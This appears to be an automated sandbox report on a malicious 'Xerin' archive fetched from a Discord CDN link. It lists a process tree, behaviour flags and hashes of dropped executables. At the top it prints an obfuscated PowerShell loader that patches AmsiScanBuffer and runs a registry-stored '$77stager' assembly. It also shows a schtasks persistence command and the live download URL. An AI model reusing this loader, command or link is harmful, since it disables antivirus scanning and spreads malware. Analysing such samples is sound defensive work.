@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$WAGwAEwflNL=$slMLYtAFhGnJz.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](77)+'o'+[Char](100)+'u'+'l'+'eH'+[Char](97)+''+[Char](110)+''+'d'+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+[Char](114)+''+[Char](110)+''+[Char](101)+'l'+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+'l')));$NoVmClAdcBgPOM=$wlPgQLaRsIPqwx.Invoke($Null,@([Object]$WAGwAEwflNL,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+'i'+''+[Char](98)+''+[Char](114)+''+[Char](97)+''+[Char](114)+''+'y'+''+[Char](65)+'')));$OtNhCULUGlSQbIhLr=$wlPgQLaRsIPqwx.Invoke($Null,@([Object]$WAGwAEwflNL,[Object](''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+''+[Char](80)+''+[Char](114)+'o'+[Char](116)+'e'+'c'+''+[Char](116)+'')));$lyVZkfa=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NoVmClAdcBgPOM,$DOvOgDRjJhhdTOUNOad).Invoke('am'+[Char](115)+''+[Char](105)+'.'+[Char](100)+''+[Char](108)+''+'l'+'');$LofeFgoWrjZhtGzVE=$wlPgQLaRsIPqwx.Invoke($Null,@([Object]$lyVZkfa,[Object](''+'A'+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+'c'+''+[Char](97)+''+[Char](110)+'Buf'+'f'+''+[Char](101)+''+[Char](114)+'')));$tjmAQMxkKi=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OtNhCULUGlSQbIhLr,$XRoytiedwFHQOaQSkxigfQ).Invoke($LofeFgoWrjZhtGzVE,[uint32]8,4,[ref]$tjmAQMxkKi);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$LofeFgoWrjZhtGzVE,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OtNhCULUGlSQbIhLr,$XRoytiedwFHQOaQSkxigfQ).Invoke($LofeFgoWrjZhtGzVE,[uint32]8,0x20,[ref]$tjmAQMxkKi);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+[Char](70)+'TW'+'A'+''+[Char](82)+''+'E'+'').GetValue(''+[Char](36)+''+[Char](55)+'7'+[Char](115)+''+'t'+'a'+[Char](103)+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\$77Boy.exeC:\Users\Admin\AppData\Roaming\$77Boy.exe2⤵
- Executes dropped EXE
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cdn.discordapp.com/attachments/1246679036214775850/1246841848383799467/Xerin.rar?ex=665ddb75&is=665c89f5&hm=e2648adbc695a1280ed7363d8ed05dcaf4ecff6a1482236197486c52e9a3b99f&2⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xb4,0x108,0x7ffe344246f8,0x7ffe34424708,0x7ffe344247183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2204,12717800052722755208,14402988799281570879,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2216 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2204,12717800052722755208,14402988799281570879,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2204,12717800052722755208,14402988799281570879,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2904 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,12717800052722755208,14402988799281570879,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,12717800052722755208,14402988799281570879,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2204,12717800052722755208,14402988799281570879,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5432 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2204,12717800052722755208,14402988799281570879,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5432 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2204,12717800052722755208,14402988799281570879,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4828 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,12717800052722755208,14402988799281570879,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4852 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2204,12717800052722755208,14402988799281570879,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5716 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,12717800052722755208,14402988799281570879,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3176 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,12717800052722755208,14402988799281570879,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2636 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,12717800052722755208,14402988799281570879,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5628 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,12717800052722755208,14402988799281570879,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5700 /prefetch:13⤵
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Videos\" -an -ai#7zMap10297:66:7zEvent286752⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\Videos\Xerin\XerinFuscatorFucker.exe"C:\Users\Admin\Videos\Xerin\XerinFuscatorFucker.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\XerinFuscatorFucker.exe"C:\Users\Admin\AppData\Local\Temp\XerinFuscatorFucker.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Users\Admin\AppData\Local\Temp\XerinJunk.exe"C:\Users\Admin\AppData\Local\Temp\XerinJunk.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\$77Boy.exe"C:\Users\Admin\AppData\Local\Temp\$77Boy.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77Boy" /tr "C:\Users\Admin\AppData\Roaming\$77Boy.exe"5⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\Videos\Xerin\XerinFuscator.exe"C:\Users\Admin\Videos\Xerin\XerinFuscator.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Videos\Xerin\XerinFuscator.exe"C:\Users\Admin\Videos\Xerin\XerinFuscator.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s camsvc1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD5537815e7cc5c694912ac0308147852e4
SHA12ccdd9d9dc637db5462fe8119c0df261146c363c
SHA256b4b69d099507d88abdeff4835e06cc6711e1c47464c963d013cef0a278e52d4f
SHA51263969a69af057235dbdecddc483ef5ce0058673179a3580c5aa12938c9501513cdb72dd703a06fa7d4fc08d074f17528283338c795334398497c771ecbd1350a
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD58b167567021ccb1a9fdf073fa9112ef0
SHA13baf293fbfaa7c1e7cdacb5f2975737f4ef69898
SHA25626764cedf35f118b55f30b3a36e0693f9f38290a5b2b6b8b83a00e990ae18513
SHA512726098001ef1acf1dd154a658752fa27dea32bca8fbb66395c142cb666102e71632adbad1b7e2f717071cd3e3af3867471932a71707f2ae97b989f4be468ab54
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD51d82067de4e70409eb265ba2ef50e943
SHA1a608f99a9a666d77674caf1a7e0ce71b2442df98
SHA256037934073b0ee5ee96a3691792c139635cb0be117d9a933670f5771df90bb61f
SHA512b751090f02b1a218bc83f6303820902275ff3447f568cffe2197ccbd1e631fed43c88c1a21c766af0f22ee397a59592b08df6cdfb2272703ac942df29f6b5088
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
5KB
MD51838f79c9dcdfd0a1b87f90f4d8f0f30
SHA1929b600985318309afa4db0e13cf8dfd244e9e62
SHA256c2443604e3012c4b0c04b10a107d5db635accf27112854367fc565193f33dce1
SHA512b4ed5480d678a5c03ce96aeb593e1004be82343926690705044b93e9cddb0b27189900f23384dadd89ce97fb896837ebcf04830e73aa4bced8a0d037667d8832
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD5ce7883ce0aebdc7f3686471d9f2b4907
SHA1d2b5b2d413f16a523e97b286f633bd5b06e92d00
SHA256d61d3e44da3b702700d22bbebe495c550aaa3c61f671541c734ff36363b493a1
SHA512ddfbf425ce8e02820126bde327190af4eed718214fd5e47bd500d4ccd9ac34157ae81b26b41c98f7c0150ece676ff29fdf08964974e2e14363fe9abba4e092c8
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENTFilesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
10KB
MD56545579c101cb0453f29698b910a4d33
SHA1c8a20b90c4a559b5ff7c0c1cb5315bafa9c91c05
SHA2568e19138bf7f2b8d6dd078b2d89b75da19f108632d941f30e44bc7e6222dd32de
SHA512e9ba39ee3c3e6ab9290f9b7b618f07d2dcbbff4c694ca10952f50196d7eb1ab79e96f020a9bc4835614b4e31f74dcaa6ea9cba4fb4483cb6f77d86a885e9b191
-
C:\Users\Admin\AppData\Local\Temp\$77Boy.exeFilesize
480KB
MD516ade5c3129fd42199fecb3f69535b84
SHA1092c901bd1e59a76c90a02ebf08a24004e4515ab
SHA256a1d24de8f0d94088c41fffaa0544cbc047efb98da7700f74bd58db2daaf5ca82
SHA512ab867abb655e9d59cca88510d824819af9db57c60a942b96542519e4bbe41500e4f5184478db0f9a4b16114f33a429a1fe78301ddea11c5464031c79b97cbfab
-
C:\Users\Admin\AppData\Local\Temp\40585F64.dllFilesize
605KB
MD5e8fc38352862ee9f26ea98310ca6228b
SHA1d61ca1128339024007be84f2c3a30e30c597b61f
SHA2566486fd7ba81fc1f22d2bea279e1655dea5a12539256fbba4f8975abda117172b
SHA512f0663851da02c62f0c36d2246d8186d12c60da98732f0bd4894011c25f00129bc556f6d7f7b229eb940c43d12c1a46a627141191ce5214e9dbc399515ee1214a
-
C:\Users\Admin\AppData\Local\Temp\Guna.UI2.dllFilesize
2.1MB
MD5278752062981db6fe27ba55f5099b8ae
SHA18446637986cf4a24e9135ee5c54f3170600e1e83
SHA256538e6ca6001d609e251f88243409a2cbc9bc0517751843e76485a2c335e7829b
SHA512142ff82ca90ca63a6a854e866615d742b585c102e8c4de5c773edeb1ac30c2cc2f6bcb190da394e4aadb4ef9518d194d99904463d6e952170d2924b16fcb00a5
-
C:\Users\Admin\AppData\Local\Temp\Install.exeFilesize
163KB
MD51a7d1b5d24ba30c4d3d5502295ab5e89
SHA12d5e69cf335605ba0a61f0bbecbea6fc06a42563
SHA256b2cc4454c0a4fc80b1fc782c45ac7f76b1d95913d259090a2523819aeec88eb5
SHA512859180338958509934d22dbc9be9da896118739d87727eb68744713259e819551f7534440c545185f469da03c86d96e425cdf5aae3fb027bb8b7f51044e08eaa
-
C:\Users\Admin\AppData\Local\Temp\XCore.dllFilesize
444KB
MD5e66e01b948d384710e109e7d562581d4
SHA1ca4f9e82789ced5623792fd168f67b41abf20041
SHA256aab1a265f0049d3004e1deda5939237a29c7914a46ff0b46c8158ce5384bb4ef
SHA51221b9309b4407e5e59c3d2af9c8791bcde06c8100beed9fcebb1a710254a3f83cea915fc2e4ce87371c16a43e6e43a46e151ca92cb38dedba9b9f47a5727d8e00
-
C:\Users\Admin\AppData\Local\Temp\XLoader.dllFilesize
526KB
MD5a67b3c5cf1da3dd42294c11e2ddc6df5
SHA1422e8f46e4e977191ec788dce5a2623dbc232b58
SHA2560649cf0c59f95bcc4f1ad77f70cc89522ef500d8b103bbe7ba418112c53bc2a4
SHA5120deeeb282241b790fdf2646600f085fc2c73f9dd376bc503f5abe8387496620377ac330755d153384da5fb035b89bee86146c06c1872d54babc00cbbd358b225
-
C:\Users\Admin\AppData\Local\Temp\XerinFuscatorFucker.exeFilesize
639KB
MD52de060d3f9f6f67988efb330e29c4fc1
SHA1e1496de704b21489642e9c2f4908889f42bcbf10
SHA256ccc3947f54257accb39bc2e92aeca3e13e4e96c995682f1af8c3892b7fa2ba00
SHA512ce664f4ab1e7f3d2bf65acbfa613cc4db3c4a7720ac71bd3432d9e6b2944c1c19fd81c453e8e6c33fe31efba90d370dedec4c9530737c2078982550a71b8dfaa
-
C:\Users\Admin\AppData\Local\Temp\XerinJunk.exeFilesize
426KB
MD516ef6975c3a2e7b86768238a5b6018b6
SHA1f54dc4177eb5bbddaf66e26caa4151992512c47a
SHA2561e7ab51a52876da677eb5d322831347902118ac65a77b7f80a8fc8c020756416
SHA512bf60d10f78b8ce04b471b733f298c07a7da759a24e4811d7b6352aae533ff1ee37fd62387cff12e80245a7b9a1d28197e1cc114ab0a7124cf226486c92378fe9
-
C:\Users\Admin\Downloads\Xerin.rarFilesize
8.2MB
MD534f0ba8a262fa353f023c00332f7d46c
SHA1ee3510ba715a48887e6dad294402f64db68f2485
SHA256a5de12a69cbf11e7558f43317c1cbfdd8eece3ad7c9b3b6e34db310704d3c337
SHA512fb058649c3cda1b4d9982c23b7b5ac71582b0fda2dc7f32c809bd0e964432f3d7686f0b7d72f668db9a973e070b73344b27fe715fa8ee9f3e1846d5b52dbb799
-
C:\Users\Admin\Videos\Xerin\Data.txtFilesize
30B
MD54eb99446804dd9182bba634b675f8820
SHA1087c62695ff4ed06938e6435b5288a1a58f71fa9
SHA256903423c6b5e691782e62f4c52abf2e4cbc3c8fa058d80c51e52afe96f63f80fd
SHA51215168423762d476de5575ccedd6a9240cbc9cd5b07a0c5ad872de66d850532e65eaa8e58307ec08b597c6df9fa8d515194af3897e2ac41f20c4a9b5e5a817aea
-
C:\Users\Admin\Videos\Xerin\XAuth.dllFilesize
161KB
MD5c7d4a3ab07d02adc892e319bf3247fa4
SHA139100c0d278929fd287f18a4346ac69a0bfa5125
SHA2564c8fb4e68ecb3e9ac2f9f24d99ead16413a125e7caa310662c28a68fd4f9818b
SHA512f3a1207b1db42726b9542fbc7c434a02b1642f9d0f6599572f5a74136743898c45c25e94caad208c3a50cae86541ba94849d0603531060e8eabd059a69600934
-
C:\Users\Admin\Videos\Xerin\XerinFuscator.exeFilesize
4.8MB
MD55a8bb4280a95729fab667f826792703b
SHA10139dbfa18441b79ccc87e082f05ff59e936d082
SHA256a6d109aa0a175087a583536f8d1dba93cfde21e9f217ed41ef086ef3df74ca5d
SHA512d770e2c639ddea88512d15a311933d31d54604d5343fa8957dee596393354565cb635ba26406d91c921b85afb8286dd0ad746654ae217db1d6b2c9e82d3a78fc
-
C:\Users\Admin\Videos\Xerin\XerinFuscatorFucker.exeFilesize
3.3MB
MD5aa23d82fde63f355d4f01e12938f5ec7
SHA1cf939269eab84173e1929c5eb24e4572716bace0
SHA256ad4dd00078cf32233c55acfbc14d0f2af9ad5111ee8a8afd541767850779dabb
SHA512f8fd652c8a36a8d34ff0c9c254f51df3dc8b6a3ccbbc5f5b1f30bb1ec37dec031e62b4007c8b89200099b8aab15244c4b417693c9d9cc7545ceabda50bd2f0e4
-
C:\Windows\Temp\__PSScriptPolicyTest_fsalf341.vip.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
